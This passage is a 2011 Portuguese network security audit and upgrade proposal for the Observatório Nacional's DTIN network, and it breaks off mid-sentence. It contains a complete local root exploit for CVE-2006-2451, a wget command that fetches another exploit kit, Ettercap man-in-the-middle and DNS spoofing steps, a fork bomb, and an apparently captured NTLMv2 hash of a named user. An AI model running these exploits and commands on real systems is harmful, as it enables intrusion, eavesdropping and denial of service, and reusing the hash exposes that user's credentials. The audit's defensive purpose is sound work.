Você está na página 1de 36

Segurana e Modernizao da Rede do DTIN do

Observatrio Nacional / RJ .

Delcimar Martins

Rio de Janeiro RJ
2011

Delcimar Martins

Segurana e Modernizao da Rede do DTIN do


Observatrio Nacional / RJ .

Com finalidade de contribuir


com uma pequena parcela ao
grande crescimento desta
instituio.

Rio de Janeiro RJ
2011

Sumrio
1. APRESENTAO DE ALGUMAS FALHAS................................................................................6
1.1 Introduo a Buffer-Overflows.............................................................................................6
1.1.2 Overflows de Variveis.............................................................................................6
1.2 Falha Linux Kernel PRCTL Core Dump Handling..............................................................7
1.3 Quebra de Passwords............................................................................................................9
1.3.1 John The Ripper......................................................................................................11
1.3.1.1 Explorao com John The Ripper..............................................................11
1.5 ARP Poisoning....................................................................................................................12
1.6 Quanto aos equipamentos da rede(Hub e Switch)..............................................................12
1.7 Ataques Man-In-The-Middle..............................................................................................13
1.7.1 Explorao..............................................................................................................13
1.7.1.1 Roubo de seo no segura........................................................................14
1.7.1.2 Roubo de seo HTTPs..............................................................................16
1.7.1.3 Forjamento de DNS (DNS Poisoning )......................................................17
1.7.1.4 Captura do HASH da autenticao dos usurios........................................19
1.8 Servios remotos.................................................................................................................19
1.8.1 SSH.........................................................................................................................19
1.8.1.1 Riscos apresentados pelo SSH...................................................................20
1.8.1.1.1 Fork Bomb.....................................................................................20
1.8.2 Outros.....................................................................................................................20
2. SOLUES TRIVIAIS.................................................................................................................21
2.1 Substituio da distribuio Linux do DTIN......................................................................21
2.2 Remoo de contas locais...................................................................................................21
2.3 Desativao de servios no utilizados...............................................................................22
2.4 Substituio dos servios no seguros................................................................................22
2.5 Utilizao de portas controladas.........................................................................................22
2.6 Preveno quanto a ataques MITM.....................................................................................23
3. PROJETO DE AMPLIAO DA SEGURANA DA REDE......................................................24
3.1 Alguns mecanismos de segurana.......................................................................................24
3.1.1 VLAN (Virtual LAN).............................................................................................24
3.1.2 IPSec.......................................................................................................................25
3.1.3 DMZ (Zona desmilitarizada)..................................................................................26
3.1.4 Firewall...................................................................................................................26
3.1.5 IDS (Intrusion Detection System)..........................................................................27
3.2 Topologia Atual...................................................................................................................28
3.3 Topologia Proposta..............................................................................................................29
3.3.1 Implementao do Firewall....................................................................................30
3.3.2 Implementao do IDS...........................................................................................32
3.3.3 Implementao do Roteador Central ou de Ncleo................................................33
3.3.4 Implementao dos Switchs C2 e A2.....................................................................34
4. CONCLUSAO................................................................................................................................34
5. REFERENCIAS BIBLIOGRFICAS...........................................................................................35

ndice de ilustraes
figura1...................................................................................................................................................9
figura2.................................................................................................................................................11
figura3.................................................................................................................................................14
figura4.................................................................................................................................................14
figura5.................................................................................................................................................14
figura6.................................................................................................................................................15
figura7.................................................................................................................................................15
figura8.................................................................................................................................................15
figura9.................................................................................................................................................17
figura10...............................................................................................................................................18
figura11...............................................................................................................................................18
figura12...............................................................................................................................................26

INTRODUO
A cada dia, e cada vez mais, os sistemas informticos participam direta ou
indiretamente do dia-a-dia das pessoas, desde curiosos, estudantes e profissionais at os
mais variados setores. Tais sistemas, algumas vezes, apresentam grandes riscos aos
seus usurios, pois, se mal utilizados, podem ser responsveis por grandes fraudes e
prejuzos, principalmente quando estes englobam Redes de Computadores. Portanto,
preciso garantir a segurana das redes a fim de evitar que pessoas no autorizadas
tenham acesso a informaes confidenciais das mesmas, prevenido que fraudadores
possam visualizar, ou alterar, informaes ou causarem algum tipo de dano.
Neste contexto, o objetivo deste projeto prover uma maior confiabilidade para os
usurios que utilizam a rede de computadores do Observatrio Nacional do Rio de janeiro
(ON). Onde sero apresentadas falhas encontradas na atual situao da rede, possveis
solues de baixo custo e uma nova Topologia para rede baseada em virtualizao, que
visa oferecer uma melhor performance e maior segurana para todos os segmentos da
mesma.

METODOLOGIA
Inicialmente sero apresentadas, e explicadas, algumas falhas crticas que podem
ser encontradas nos computadores e na prpria Rede do instituto, para que, logo em
seguida, sejam propostas as solues para os referidos problemas, dividindo-se essas,
em solues triviais e de baixo custo e solues mais abrangentes, como uma nova
Topologia de Rede que ser proposta.

1. APRESENTAO DE ALGUMAS FALHAS


Neste ponto ser feita uma introduo de algumas falhas para posterior
demonstrao.

1.1 Introduo a Buffer-Overflows


Consiste de um ataque de manipulao a memria, permitindo ao usurio introduzir
dados que no sero corretamente verificados pela aplicao. Ocorre normalmente aps
uma introduo excessiva de dados, forando assim o programa a sofrer um crash.
Dependendo do local da memria onde a introduo de dados foi feita, existiro inmeras
possibilidades que acarretaro no rompimento da lgica do fluxo do programa.
Existem trs classes de buffer overflows:
Overflows Clssicos
Overflows de variveis
Falhas de formatao de strings
Sero abordados aqui apenas os overflows de variveis, por ser o tipo de falha que
encontrei nos computadores da instituio.

1.1.2 Overflows de Variveis


Esse tipo de overflow, que na realidade um mtodo de acesso aos outros tipos,
consiste basicamente em clculos aritmticos com variveis inteiras que terminam por
gerar resultados incorretos e susceptveis a explorao maliciosa.
Por exemplo:
int a = 0xffffffff;
int b = 1;
int s = a + b;

Assim, se os inteiros forem de 32bits, o valor de s ser zero. J para inteiros de


64bits, o valor ser 0x100000000.
Heap wrap-around

Exemplo:
int func(int *vectori, int comp) {
int *vectord, i;
vectord = malloc(comp * sizeof(int));
if (vectord == NULL)
return 1;
for (i = 0; i < comp; i++)
vectord[i] = vectori[i];
return vectord;
}

O argumento da funo malloc() ser o produto da varivel inteira comp pelo


tamanho do tipo de dados inteiros(4bytes para inteiros de 32bits). Suponha que o valor de
comp seja 0x40000001, ento o produto, em 32bits, ser igual a 4(truncatura). Assim, a
funo malloc() alocar apenas 4bytes, enquanto muito mais bytes sero escritos no
heap, acarretando no overflow. Essa escrita excessiva de bytes no heap pode ser
explorada atravs de algumas tcnicas.
Exemplo II: (Tamanhos negativos )
int func(char *orig, int comp) {
char *dest[80];
if (comp > sizeof(dest)) return 1;
memcpy(dest, orig, comp);
return 0;
}

Esse exemplo apenas testa se o valor de comp maior do que o tamanho do


vector dest[], mas no testa se negativo! Caso seja negativo, a funo memcpy() ir
usar o valor como inteiro sem sinal, o que provocar o overflow. Suponha que o valor de
comp seja -200, ento a funo memcpy() ir tentar copiar 4294967096 bytes,
provocando o crash imediato e interrompendo o programa.

1.2 Falha Linux Kernel PRCTL Core Dump Handling


Foi divulgada uma falha em julho de 2006, a qual afetou uma srie do kernel 2.6 do
linux. Consistindo basicamente em um possvel crash na varivel newconntrack em
sctp_packet, que pode ser explorada por um programa malicioso causando uma negao
de servio(denial of service) ou possibilitando ao usurio ganhar privilgios no sistema.
Dentre as verses afetadas, est uma que acompanha a instalao padro da
distribuio Kubuntu 6.06, bastando que o usurio mantenha a tecla ESC pressionada
durante o boot e escolha a verso 2.6.15-23 do kernel. Uma vez carregado o Sistema
Operacional, a simples execuo do cdigo malicioso trar ao usurio privilgios de root
no sistema.

Abaixo temos um exploit para tal:


/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ;
chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -i");
}

Um exploit conhecido por muitos hacker foi utilizado em uma maquina


potencialmente fragil internamente, mas no descartando outras maquinas onde um
hacker poderia penetrar e us-la para ter acesso a outras maquinas na rede.
Demonstrao:
no prompt da funk.on.br em linha ssh baixe o programa:
wget http://www.grsecurity.net/~spender/enlightenment.tgz

Figura 1 Explorao da falha local root


Uma vez que o usurio adquiriu privilgios de root, poder usar meios que
garantam posteriores acessos, pondo assim toda a rede em risco, visto que um super
usuario ter permisso de acesso ao hardware, tal como a placa de rede, possibilitando a
utilizao de tcnicas mais avanadas descritas mais adiante.

1.3 Quebra de Passwords


Outro ponto crtico o fato de que o usurio root ter acesso a arquivos

importantes do sistema, tais como arquivos que provem o correto funcionamento dos
daemons, configuraes crticas da rede e arquivos que contm informaes dos usurios
locais, incluindo a senha encriptada em MD5.
Demonstrar-se uma maneira simples de obteno das senhas atravs dos
respectivos hashs MD5, no esquecendo de ressaltar que diversas so as tcnicas que
possibilitam a obteno das senhas, muitas delas bem mais eficientes da que ser
demonstrada, como, por exemplo, uso de tabelas randmicas com aplicativos
particulares, que chegam a quebrar senhas difceis em alguns minutos.
Segue abaixo uma demonstrao de hashs MD5 gerado por um simples programa
em c++:
0cc175b9c0f1b6a831c399e269772661 - a
92eb5ffee6ae2fec3ad71c777531578f - b
4a8a08f09d37b73795649038408b5f33 - c
8277e0910d750195b448797616e091ad - d
e1671797c52e15f763380b45e841ec32 - e
8fa14cdd754f91cc6554c9e71929cce7 - f
b2f5ff47436671b6e533d8dc3614845d - g
2510c39011c5be704182423e3a695e91 - h
865c0c0b4ab0e063e5caa3387c1a8741 - i
363b122c528f54df4a0446b6bab05515 - j
8ce4b16b22b58894aa86c421e8759df3 - k
2db95e8e1a9267b7a1188556b2013b33 - l
6f8f57715090da2632453988d9a1501b - m
7b8b965ad4bca0e41ab51de7b31363a1 - n
d95679752134a2d9eb61dbd7b91c4bcc - o
83878c91171338902e0fe0fb97a8c47a - p

Obs.: os cdigos do programa no coloquei aqui pois ocuparia muitas paginas.


O uso de tabelas randmicas no ser demonstrado neste documento por exigir
uma quantidade relativamente alta de espao livre em disco, o que o torna invivel em
alguns casos.

1.3.1 John The Ripper


Uma aplicao clssica para quebra de vrios tipos de hashs o famoso John The
Ripper, que testa possibilidades de senhas usando uma incrvel inteligncia para gerar
possveis senhas que tenham um certo sentido, no usando, por exemplo, combinaes
pouco provveis como aaaaaa, aaaaab, aaaaac etc., deixando tais combinaes para
ultimo caso, o que torna o processo de obteno das senhas bastante mais rpido.
O John identifica o tipo de criptografia do hash e encripta igualmente suas
combinaes, em seguida ele simplesmente faz a comparao dos hashs, se forem
iguais, eis a senha.
Maiores informaes podem ser obtidas no site dos desenvolvedores:
< http://www.openwall.com/john/ >

1.3.1.1 Explorao com John The Ripper


No linux, o arquivo padro que contm as senhas dos usurios locais o
/etc/shadow. Da anlise dos computadores do laboratrio Ada, percebe-se que estes
possuem duas contas com senhas triviais, que podero ser utilizadas por usurios mal
intencionados com intuitos de dificultar sua identificao.
Segue abaixo uma demonstrao da obteno das senhas usando o John The
Ripper da maquina funk.on.br:

Figura 2 Quebra de passwords locais

Adiante sero apresentadas falhas mais abrangentes, que pem em risco todos os
seguimentos da rede. Estas so provenientes do protocolo ARP(Adrress Resolution
Protocol), que explicaremos seu funcionamento para posterior entendimento da tcnica
conhecida como ARP Poisoning.

1.5 ARP Poisoning


A essncia do protocolo ARP alcanar um meio rpido que permita a
comunicao entre os componentes da rede, porm desde sua criao no tem sofrido
grandes modificaes, tornando-o um protocolo susceptvel a vulnerabilidades, por
exemplo, um dispositivo da rede poder aceitar ARP replys de qualquer origem sem que
tenha enviado requests, podendo assim receber informaes falsas e ter sua tabela ARP
envenenada. com base nessa falha que se situa a tcnica de ARP Poisoning.
A tabela ARP poder ser inserida manualmente por um usurio(arp s) ou atravs
da utilizao de ferramentas que promovem o envenenamento da rede, bons exemplos
so os famosos Cain&Abel, Ettercap e o Dsniff, que conseguem roubar sees
seguras(SSL) atravs fornecimento de certificados forjados, que se aceito, ser a chave
para quebra de uma seo que se julga codificada.

1.6 Quanto aos equipamentos da rede(Hub e Switch)


Alguns administradores ainda julgam que ao interligar a rede utilizando switchs
estaro salvos de escutas(sniffing). No entanto, existem meios de atingir o mesmo fim que
se atingiria caso a rede fosse interligada atravs de hubs.
O Switch processa os dados de forma diferente dos hubs, que transmitem os dados
que recebem em uma porta para todas as outras. Este mantm uma tabela CAM(Content
Addressable Memory) interna, que faz a ligao entre o endereo de rede e a porta de
destino/recepo. Ao receber um pacote, o switch guarda o endereo de origem na tabela
CAM para que, da prxima vez que um pacote com destino a esta porta chegue, ele no
seja encaminhado para todas as portas, visto que o endereo j est registrado. A falha
est no fato de que a tabela CAM atualizada dinamicamente, permitindo assim a
alterao do MAC registrado para a porta onde est ligado. A isto se d o nome de Port
Stealing.

1.7 Ataques Man-In-The-Middle


Os ataques de MITM baseiam-se em forar a maquina vitima, ou toda a rede, a
encaminhar o trfego para a maquina do atacante, que por sua vez, mantm o fluxo da
rede reencaminhando os dados, tendo assim acesso a todo o trafego, seja encriptado ou
no.
Aps a maquina atacante estar entre a vtima e todos os destinos desta, o sniffing
da rede se torna simples, dado que todos os pacotes atravessam o atacante, possvel
obter claramente passwords de sees sem codificao(tais como sees de telnet, ftp,
http, etc), roubar sees seguras(https, ssh, etc), injetar pacotes em uma dada conexo
de uma determinada vitima, alterar o contedo dos pacotes em circulao, eliminar
determinados pacotes ou at aumentar a quantidade de dados.
So exemplos dos ataques citados:
Injeo de comandos: Injeo de comandos para um servidor, emulao de respostas
falsas ao cliente e etc;
Injeo de cdigo malicioso: insero de cdigo em paginas web ou email(javascript,
trojans,

vrus,

notificaes

falsas,

etc)

ou

at

alterao

de

binrios

em

transferncias(vrus, backdoors, etc);


Key Exchange(troca de chave): alterao da chave pblica de cliente e servidor,
enganando ambos os lados fazendo-se passar pelo lado oposto(exemplo SSHv1);
Substituio de parmetros: O atacante poder influenciar a vitima e o servidor a
usarem uma verso menos segura do protocolo, por exemplo, de SSH1.99 para SSH1.51;
Estes so apenas alguns exemplos para que se perceba a ameaa que representa um
ataque MITM.

1.7.1 Explorao
Demonstrar-se como as falhas acima citadas podem ser facilmente exploradas
atravs de algumas ferramentas, em particular, usaremos a ferramenta Ettercap em
nossos testes. Maiores informaes sobre o Ettercap podem ser encontradas no site: <
http://ettercap.sourceforge.net >
Ser usado um dos computadores na rede DMZ, no esquecendo de ressaltar que
a ferramenta tambm est disponvel para outras plataformas, tais como Windows e
Solaris.
Aps

adquirir

privilgios

de

root

explorando

falha

no

kernel

citada

anteriormente(ou qualquer outra), instala-se o Ettercap, que est disponvel tanto para

modo texto, como para interface grfica(gtk).

1.7.1.1 Roubo de seo no segura


Iniciar-se a bateria de exposio das falhas provenientes do protocolo ARP com a
explorao de simples sees http, onde podemos alterar o contedo de sites visitados
pela vitima, capturar senhas de logins no seguros ou at fazer espionagem visualizando
os passos da vitima.
Iniciou-se o ettercap em modo texto:

Figura 3 Rodando ettercap em modo texto


O comando acima roda o ettercap pondo-o entre a vtima (10.0.1.188) e o seu
gateway (10.0.1.223) e armazena todo o trafego dentro do arquivo teste. Usar-se- o
computador da vtima para acessar sees http no seguras e vejamos o resultado
abaixo:

Figura 4 Senha no segura capturada


No exemplo acima, a suposta vitima efetuou login no servidor helpdesk.on.br e o
sniffer interceptou sua senha, armazenando-a no arquivo teste. Abaixo, foi efetuado login
no servidor wiki-dtin.on.br, donde pode-se ver o login e senha na figura 5.

Figura 5 Senha no segura capturada


Pode-se tambm verificar as conexes estabelecidas pela vitima e finaliz-las,
caso desejado, veja:

Figura 6 Visualizando conexes dos usurios com ettercap

Figura 7 Killando uma conexo com ettercap


Outro ponto crtico diz respeito utilizao de e-mail POP na rede, tornando trivial
a quebra da privacidade dos seus usurios.
Segue abaixo um exemplo:

Figura 8 Senha de e-mail POP capturada


O ettercap tambm poder receber novas funcionalidades atravs da utilizao de

plugins, dentre eles destacamos; coletores de passwords de diversos protocolos; filtro e


substituidor de pacotes; OS fingerprinting; ferramentas para killar conexes, port stealing
(mtodo alternativo de sniffing em redes comutadas, sem que haja envenenamento
ARP).

1.7.1.2 Roubo de seo HTTPs


O roubo de sees HTTPs uma tcnica complexa comparada com a
anteriormente referida, uma vez que apenas o envenenamento ARP e a interceptao do
trafego no so suficientes, visto que os dados agora circulam encriptados. Quando uma
seo desse tipo iniciada, a maquina remota(servidor) envia ao cliente um certificado
digital que comprova a sua identidade. Este certificado, por sua vez, est assinado por
uma Autoridade de Certificao(CA) bem conhecida. Desde modo, recebido o certificado,
o cliente poder enviar as informaes para o servidor encriptando-as com a chave
pblica do mesmo (que est embutida no certificado). Logo, algum que esteja a
capturar o trafego no poder desencriptar os dados, uma vez que no possui a chave
privada do servidor.
Diante dessa situao, podemos recorrer a seguinte tcnica:
O atacante poder enviar um certificado falso para a vitima antes que o servidor o
faa, assim o cliente encriptar os dados com a chave pblica do atacante, tornando
possvel a desencriptao. Quanto autenticidade do certificado, ainda pode-se recorrer
a outro artifcio; Aproveitar-se de uma falha conhecida do Internet Explorer(IE, verses 5 e
6), dada sua incapacidade de analisar os limites bsicos dos certificados(basic
constraints). Possibilitando a qualquer um que obtenha um certificado vlido assinado (de
preferncia pela VerySign) gerar outro certificado valido para um domnio qualquer.
Ou apenas esperar que a vitima, leiga, aceite o certificado.
Demonstrao:
Antes de iniciar os testes, faz-se necessrio algumas configuraes:
1. Abrir o arquivo etter.conf e descomentar as linhas do redir_command_on e
redir_command_off(referentes ao iptables). Ou usar uma regra iptables manualmente que
encaminhe o trafego ssl para uma outra porta.
2. Alterar o ec_uid e o ec_gid para 0.
3. Ativar a funo IP forwarding para garantir o encaminhamento de pacotes no
firewall;
# echo 1 > /proc/sys/net/ipv4/ip_forward

Finalmente o Ettercap est pronto para inspecionar o trafego SSL.

Aps devidamente iniciado, todo o trafego da vtima est passando pela maquina
do atacante. Usou-se um computador do DTIN para acessar um servidor HTTPs e
verificar o resultado;

Figura 9 Captura de senha segura(HTTPS-webmail.on.br)

1.7.1.3 Forjamento de DNS (DNS Poisoning )


Outra categoria do MITM que apresenta um risco relativamente alto, uma vez que
redireciona o acesso da vitima (o browser, por exemplo) sem que ela perceba, podendo o
atacante usar algum tipo de engenharia social para obter informaes importantes, tais
como senhas ou dados bancrios.
O atacante intercepta os pedidos de DNS para recolher o ID do pedido,
respondendo-os antes que o servidor verdadeiro de DNS o faa, visto que o cliente
ignorar a segunda resposta(do DNS real).
Demonstrao:
Algumas configuraes necessrias:
1. Abrir o arquivo etter.dns e adicionar alguma entrada, exemplo:
www.google.com.br A 150.165.130.144
Que ir redirecionar os pedidos de acessos ao www.google.com.br
para o IP 150.165.130.144(maquina qualquer com uma pagina devidamente hospedada).
Mais uma vez usou-se um computador do DTIN para o teste. Ao tentar acessar o
site www.google.com.br o DNS foi forjado e o browser da vtima direcionado para o IP
configurando anteriormente.
Veja o resultado:

Figura 10 Browser da vitima sofrendo DNS Spoof

Figura 11 Tela do atacante no momento do DNS Spoofado

1.7.1.4 Captura do HASH da autenticao dos usurios


A autenticao dos usurios que utilizam o Departamento de Informtica (DI) feita
no servidor NT utilizando SMB com criptografia NTLMv2. Promovendo ataques MITM
pode-se, tambm, obter os hashs dos usurios que efetuarem login enquanto da
execuo do sniffer.
Eis o formato do referido hash:
USER: joaofilho HASH:
joaofilho:"":"":35645096EAA6814BF02FD33C1BEDF4185ACBCFD98CACA9
44:B0D88EBF3862E2B37CC6AABAB26435980B20478219CBA5D4:99ADB9
D98C94A2B9 DOMAIN: DINF
Aproveita-se a oportunidade para lembrar que em 2002, durante a conferencia
BlackHat, foi demonstrada a quebra de hashs NTMLv2 utilizando um cluster formado por
16 maquinas, valendo salientar que, durante esse tempo, novas tcnicas tem surgido,
tornado o feito relativamente mais simples e a conseqente insegurana do referido
mtodo de criptografia. A demonstrao da quebra do NTLMv2 pode ser encontrada em
http://www.blackhat.com/presentations/win-usa-02/urity-winsec02.ppt
O uso de tabelas randmicas um timo meio de obter as senhas atravs do hash,
porm, como antes citado, por exigir grande capacidade de armazenamento necessrio
para armazenar as tabelas, deixar-se- essa demonstrao a cargo do leitor.

1.8 Servios remotos


Dada a possibilidade da obteno de privilgios na rede, faz-se necessrio uma
ateno quanto aos servios em execuo que possibilitam aos usurios obterem acesso
remoto a mesma. Alguns destes, inclusive, pem em risco a privacidade dos arquivos
pessoais de usurios que estejam logados no momento de um possvel ataque.

1.8.1 SSH
O Secure Shell ou SSH , simultaneamente, um programa de computador e um
protocolo de rede que permite a conexo com outro computador na rede, de forma a
executar comandos de uma unidade remota. Possui as mesmas funcionalidades do
TELNET, com a vantagem da conexo entre o cliente e o servidor ser criptografada.
O SSH faz parte da sute de protocolos TCP/IP que torna segura a administrao
remota de um servidor *nix. (Wikipdia).

1.8.1.1 Riscos apresentados pelo SSH


Mais uma vez, da analise dos computadores que compem a rede, percebe-se que
grande maioria destes est a rodar o SSH, particularmente, todos os computadores do
DTIN com Linux.
Demonstrar-se- a facilidade de promover o travamento de algum computador
aproveitando-se de consumo do processador por uma tcnica conhecida como Fork
Bomb e uma maneira simples de obter acesso ao diretrio remoto de algum usurio
logado na rede.

1.8.1.1.1 Fork Bomb


Uma vez estabelecida a conexo com a maquina remota, basta entrar com um
simples comando, veja:
# :(){ :|:& };:

Quanto maior for o clock da maquina vitima, mais rapidamente se dar o


travamento da referida maquina logada.
Esta linha de comando cria uma funo chamada ":" que no aceita argumentos representada no comando por ":(){ ... }". O cdigo dentro da funo recursivamente chama
a funo e envia o retorno desta para outra instncia da mesma funo - representada no
comando por ":|:". O smbolo "&" pega a chamada e a coloca para ser executada em
segundo plano. Desta forma, os processos filhos no caem caso o processo pai seja
finalizado. Note que por invocar a funo duas vezes, o crescimento do nmero de
processos se d de forma exponencial! O smbolo ";" fecha a definio da funo e o ":"
no final a primeira execuo da funo que inicia o forkBomb.

1.8.2 Outros
Verificou-se tambm a execuo de outros servios desnecessrios, entre eles
destacamos o apache, SQL, SMTP, POP, SMB e FTP, pois possibilitam que sejam abertas
portas ao meio externo, assim como no caso do SSH anteriormente abordado. Estes, por
sua vez, requerem uma ateno extra, uma vez que falhas os envolvendo so
freqentemente divulgadas, permitindo que invasores tomem controle das maquinas e as
utilizem para fins fraudulentos, como, por exemplo, envio de spams.

2. SOLUES TRIVIAIS
Adiante sero apresentadas solues triviais para as falhas anteriormente
mencionadas. Faz-se necessrio ressaltar que tais solues tambm visam remediar
possveis problemas no descritos neste documento. Mais a frente, uma nova topologia
de rede ser proposta, a qual poder corrigir o restantes das deficincias no solucionas
neste tpico.

2.1 Substituio da distribuio Linux do DTIN


Do conhecimento da falha local root que afeta a distribuio do Sistema
Operacional Linux atualmente instalado no laboratrio, poder-se-ia sugerir apenas a
atualizao do referido kernel e conseqente soluo da falha, mas vale salientar que
outras falhas tambm afetam a distribuio, a saber, uma mais critica do que a citada
neste documento e que afeta o aplicativo samba, podendo esta ser explorada local ou
remotamente

(acesse

http://www.securityfocus.com/bid/23972/info

para

mais

informaes), dentre outras que possam vir a ser descobertas.


Do exposto, percebe-se a necessidade de um meio que automatize a verificao e
atualizao de pacotes componentes da distribuio em uso, uma vez que o
administrador no poder estar sempre a exercer tais atividades. Prope-se ento a
utilizao de uma distribuio que promova tais verificaes e conseqente atualizao
do sistema em um processo automatizado, no esquecendo, contudo, da necessidade de
apresentar uma interface amigvel e de simples manuseio.
Sugere-se ento a utilizao da distribuio Debian, por atender as necessidades
acima mencionadas.

2.2 Remoo de contas locais


Eis um fator crtico que possibilita a realizao de ataques rede, dificultando, e
at impossibilitando, a identificao dos responsveis.
Prope-se a remoo de contas de usurios locais dos computadores
componentes dos laboratrios, tendo em vista que tais contas alm de desnecessrias,
possibilitam o acesso de usurios no autorizados aos computadores e pe em risco os
demais usurios.

2.3 Desativao de servios no utilizados


A execuo dos servios daemons, anteriormente mencionados, entre outros, fazse desnecessria. Estes, alm de promover o consumo de capacidades do computador,
esto inutilizados e, algumas vezes, apresentam riscos rede e a seus usurios, como
dantes demonstrado no caso particular do SSH, no deixando de ressaltar que uma gama
maior de falhas podem aproveitar-se dos demais servios, como falhas no SQL e apache.
Assim, comprova-se as vantagens na desativao dos mesmos.

2.4 Substituio dos servios no seguros


A utilizao de servios de autenticao no seguros, tais como POP para
visualizao de e-mails e SSH para atualizao de sites (como sugerido no prprio site do
DI), na atual situao da rede, de grande risco para os usurios de tais servios,
deixando-os completamente expostos a simples ataques que possibilitam a captura de
suas respectivas senhas, alm de todo o seu trafego, como j demonstrado neste
documento, rompendo assim com a privacidade dos mesmos.
Este problema poder ser sanado com a utilizao de mtodos de criptografia que
visam proteger todos os segmentos da rede, mtodos estes que sero abordados mais
adiante. Neste ponto, oportuno lembrar que existem solues mais simples para tais,
como implementao de SPOP3 e SFTP (servidores POP e FTP que usam SSL).

2.5 Utilizao de portas controladas


Atualmente o processo de autenticao dos usurios feita em portas no
controladas, permitindo que qualquer dispositivo conectado fisicamente a rede, ainda que
no autenticado, tenha acesso a mesma, dificultado drasticamente a identificao de
responsveis que violem algum segmento.
A porta controlada permite que os dados sejam enviados entre um cliente e a rede,
mas apenas se o cliente estiver autenticado. Antes da autenticao, o comutador est
aberto e nenhum quadro encaminhado entre o cliente e a rede. Apenas depois de ser
autenticado com xito usando o IEEE 802.1X (apresentei um trabalho sobre no dia
07/05/2011), o comutador fechado e os quadros so encaminhados entre o cliente e a
rede.

2.6 Preveno quanto a ataques MITM


Pouco h a fazer para evitar este tipo de ataque, fazendo-se importante que o
Administrador saiba que regras pode por em prtica para minimizar o impacto que este
pode oferecer.
So alternativas:
1. Encriptar as informaes com algoritmos seguros, com um mnimo de 128bits,
assim um MITM apenas ir ver dados encritados. Por exemplo, IPsec para a
camada de rede, SSLv3 para a camada de transporte e PGP para a camada
de aplicao. Contudo, essa alternativa apresenta-se trabalhosa e pouco
prtica.
2. Configurar os switchs de modo a permitir o MAC binding, ficando assim cada
porta associada a apenas um endereo MAC. Existem tambm switchs que
ao detectarem o mesmo MAC address em vrias portas rejeitam-na,
impossibilitando assim o ataque.
3. Criar entradas estticas nas tabelas ARP dos computadores, podendo utilizar
scripts de logons para o mesmo. Essa alternativa torna-se pouco vivel em
grandes redes, uma vez da necessidade de alterao dos scripts sempre que
um novo dispositivo for adicionado a mesma.
4. Existem ferramentas como o ArpWatch que permitem registrar os endereos
MAC de uma rede e alterar quando detecta alteraes na associao entre
endereo de IP/MAC j registrados.
Indica-se a conjugao dos pontos dois e quatro como boas alternativas para
minimizar os efeitos desse tipo de ataque.

3. PROJETO DE AMPLIAO DA SEGURANA DA REDE


Neste ponto ser apresentada uma topologia para Rede, a qual implementar
regras bsicas essenciais, garantindo um maior nvel de

segurana, possvel

implementao de capacidades avanadas com aplicaes de polticas de segurana e


qualidade de servio, alm de mecanismos avanados para localizar origens de possveis
ameaas.
Ressalta-se a grande importncia de uma boa poltica de segurana que descreva
as normas e diretrizes a serem seguidas por usurios e administradores da rede, visto
que toda e qualquer regra de segurana implementada no ter validade se no houver
um controle da segurana e da gerencia do projeto. O assunto, apesar da grande
importncia, no ser abordado, cabendo a outras autoridades a elaborao do mesmo.

3.1 Alguns mecanismos de segurana


Ser apresentada uma introduo aos principais mecanismos que buscam
promover uma maior segurana das redes. Atenta-se que muitos so os meios que
garantem bons nveis de segurana, porm neste tpico sero abordados apenas os mais
crticos.

3.1.1 VLAN (Virtual LAN)


Uma VLAN , basicamente, uma coleo de ns que so agrupados em um nico
domnio broadcast, baseado em outra coisa que no a localizao fsica. Em uma rede
comum, tudo que estiver de um mesmo lado do roteador faz parte do mesmo domnio
broadcast. Um switch com uma VLAN implementada tem mltiplos domnios broadcast e
funciona de maneira semelhante a um roteador.
Seguem algumas vantagens da utilizao de VLANS
Segurana. Separa os sistemas que contm dados sigilosos do resto da rede,
reduzindo a possibilidade de acesso no autorizado.
Projetos/aplicativos especiais. As tarefas de gerenciar um projeto ou trabalhar
com um aplicativo podem ser simplificadas pelo uso de uma VLAN que congrega
todos os ns necessrios.
Desempenho/Largura de banda. Um monitoramento cuidadoso da utilizao da
rede permite que o administrador crie VLANs que reduzam o nmero de saltos
entre os roteadores e aumentem a largura de banda aparente para os usurio da
rede.

Broadcasts/Fluxo de trfego. A caracterstica principal de uma VLAN que ela


no permite que o trfego broadcast chegue aos ns que no fazem parte da
VLAN. Isso ajuda a reduzir o trfego de broadcasts. As listas de acesso permitem
que o administrador da rede controle quem v o trfego da rede.
Departamentos/Tipos especficos de cargos. Pode-se configurar VLANs para os
departamentos que utilizam muito a Internet ou VLANs que conectam categorias
especficas de empregados de departamentos diferentes.

3.1.2 IPSec
Voltado para a encriptao de camada IP e seu padro define alguns formatos de
pacote novos; Autenticao de Cabealho (Authentication Header, AH) para fornecer a
integridade dos pacotes entre origem e destino, e o Encapsulamento Seguro da
Informao (Encapsulating Security Payload, ESP).
O gerenciamento de chaves, associaes de segurana (Security Associations, SA)
e os parmetros para a comunicao IPSec entre dois dispositivos so negociados
atravs do IKE (Inernet Key Exchange, anteriormente chamado de Internet Security
Association Key Management Protocol ou ISAKMP/Oakley). O IKE utiliza Certificados
Digitais (que garantem a identidade de uma pessoa, evitando a falsificao de
identidades) para autenticao de dispositivos, permitindo a criao de grandes redes
seguras. Atualmente, o protocolo j encontrado em roteadores, firewalls e na maioria
dos sistemas operacionais.
O IPSec pode ser usado de dois modos:
Modo de transporte: Neste modo, o cabealho IPSec inserido logo depois
